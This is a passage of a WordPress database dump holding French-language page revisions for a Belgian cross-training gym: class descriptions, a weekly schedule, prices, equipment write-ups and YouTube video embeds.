qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background:#E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:54:27', '2013-10-05 08:54:27', '', 11, 'http://www.crosstrainingcenter.be/11-revision-124/', 0, 'revision', '', 0),
(354, 1, '2013-10-05 08:55:15', '2013-10-05 08:55:15', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n\r\n<span style=\"text-decoration: underline; background:#F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background:#E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:55:15', '2013-10-05 08:55:15', '', 11, 'http://www.crosstrainingcenter.be/11-revision-125/', 0, 'revision', '', 0),
(356, 1, '2013-10-05 08:55:37', '2013-10-05 08:55:37', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n\r\n<span style=\"text-decoration: underline; background:#F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background:#E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:55:37', '2013-10-05 08:55:37', '', 11, 'http://www.crosstrainingcenter.be/11-revision-126/', 0, 'revision', '', 0),
(359, 1, '2013-11-01 08:58:07', '2013-11-01 08:58:07', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebell</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-11-01 08:58:07', '2013-11-01 08:58:07', '', 22, 'http://www2.crosstrainingcenter.be/22-revision-v1/', 0, 'revision', '', 0),
(360, 1, '2013-11-01 09:09:47', '2013-11-01 09:09:47', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n<div align=\"center\">\r\n\r\nPrésentation du Cross Training Namur\r\n\r\n<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div>\r\n\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n<div align=\"center\">\r\n\r\nOuverture du Cross Training Limelette\r\n\r\n<iframe src=\"//www.youtube.com/embed/6tWEAsQ_ePQ\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div>\r\n\r\n</div></td>\r\n</tr>\r\n</table>', 'En image', '', 'publish', 'closed', 'open', '', 'en-image', '', '', '2013-11-03 10:23:00', '2013-11-03 10:23:00', '', 0, 'http://www2.crosstrainingcenter.be/?page_id=360', 0, 'page', '', 0),
(361, 1, '2013-11-01 09:09:47', '2013-11-01 09:09:47', 'Retrouvez ici les vidéos illustrant le déroulement des séances.\r\n\r\n&lt;iframe width=\"420\" height=\"315\" src=\"//www.youtube.com/embed/ginoAkCLNIM\" frameborder=\"0\" allowfullscreen&gt;&lt;/iframe&gt;\r\n\r\n&nbsp;', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:09:47', '2013-11-01 09:09:47', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(362, 1, '2013-11-01 09:10:38', '2013-11-01 09:10:38', ' ', '', '', 'publish', 'open', 'open', '', '362', '', '', '2013-11-03 09:49:54', '2013-11-03 09:49:54', '', 0, 'http://www2.crosstrainingcenter.be/?p=362', 5, 'nav_menu_item', '', 0),
(363, 1, '2013-11-01 09:11:16', '2013-11-01 09:11:16', 'Retrouvez ici les vidéos illustrant le déroulement des séances.\r\n<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"315\" width=\"420\" allowfullscreen=\"\" frameborder=\"0\"></iframe>', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:11:16', '2013-11-01 09:11:16', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(364, 1, '2013-11-01 09:12:53', '2013-11-01 09:12:53', '<h1>Retrouvez ici les vidéos illustrant le déroulement des séances.</h1>\r\n<h1>\r\n<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"315\" width=\"420\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h1>', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:12:53', '2013-11-01 09:12:53', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(365, 1, '2013-11-01 09:28:40', '2013-11-01 09:28:40', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"arrondi\">\n\nPrésentation du Cross \n\n<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\n\n</div></td>\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"arrondi\">\n\n<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\n\n</div></td>\n</tr>\n</table>\n\n', 'En image', '', 'inherit', 'open', 'open', '', '360-autosave-v1', '', '', '2013-11-01 09:28:40', '2013-11-01 09:28:40', '', 360, 'http://www2.crosstrainingcenter.be/360-autosave-v1/', 0, 'revision', '', 0),
(374, 1, '2013-11-01 09:23:23', '2013-11-01 09:23:23', '<h1>Retrouvez ici les vidéos illustrant le déroulement des séances.</h1>\r\n&nbsp;\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3><iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n<td>\r\n<h3><iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:23:23', '2013-11-01 09:23:23', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(366, 1, '2013-11-01 09:15:12', '2013-11-01 09:15:12', '<h1>Retrouvez ici les vidéos illustrant le déroulement des séances.</h1>\r\n<br>\r\n<br>\r\n<table border=\"0\">\r\n<tr>\r\n<td>\r\n<h1>Ouverture de notre Cross Training Limelette</h><iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"315\" width=\"420\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n</td>\r\n<td>\r\n<h1>Présentation de notre Cross Training Namur</h><iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"315\" width=\"420\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n</td>\r\n</tr>\r\n</table>\r\n', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:15:12', '2013-11-01 09:15:12', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(367, 1, '2013-11-01 09:16:47', '2013-11-01 09:16:47', '<h1>Retrouvez ici les vidéos illustrant le déroulement des séances.</h1>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h1>Présentation du Cross Training Namur<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"315\" width=\"420\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h1>\r\n</td>\r\n<td>\r\n<h1>Ouverture du Cross Training Limelette<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"315\" width=\"420\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:16:47', '2013-11-01 09:16:47', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(368, 1, '2013-11-01 09:17:07', '2013-11-01 09:17:07', '<h1>Retrouvez ici les vidéos illustrant le déroulement des séances.</h1>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3>Présentation du Cross Training Namur<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"315\" width=\"420\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n<td>\r\n<h3>Ouverture du Cross Training Limelette<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"315\" width=\"420\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:17:07', '2013-11-01 09:17:07', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(370, 1, '2013-11-01 09:19:34', '2013-11-01 09:19:34', '<h1>Retrouvez ici les vidéos illustrant le déroulement des séances.</h1>\r\n&nbsp;\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3>Présentation du Cross Training Namur<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"315\" width=\"420\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n<td>\r\n<h3>Ouverture du Cross Training Limelette<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"315\" width=\"420\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:19:34', '2013-11-01 09:19:34', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(369, 1, '2013-11-01 09:17:32', '2013-11-01 09:17:32', '<blockquote>\r\n<h1>Retrouvez ici les vidéos illustrant le déroulement des séances.</h1>\r\n</blockquote>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3>Présentation du Cross Training Namur<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"315\" width=\"420\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n<td>\r\n<h3>Ouverture du Cross Training Limelette<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"315\" width=\"420\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:17:32', '2013-11-01 09:17:32', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
(371, 1, '2013-11-01 09:21:36', '2013-11-01 09:21:36', '<h1>Retrouvez ici les vidéos illustrant le déroulement des séances.</h1>\r\n&nbsp;\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3>Présentation du Cross Training Namur<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n<td>\r\n<h3>Ouverture du Cross Training Limelette<iframe src=\"//www.youtube.com/embed/ginoAkCLNIM\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En image', '', 'inherit', 'open', 'open', '', '360-revision-v1', '', '', '2013-11-01 09:21:36', '2013-11-01 09:21:36', '', 360, 'http://www2.crosstrainingcenter.be/360-revision-v1/', 0, 'revision', '', 0),
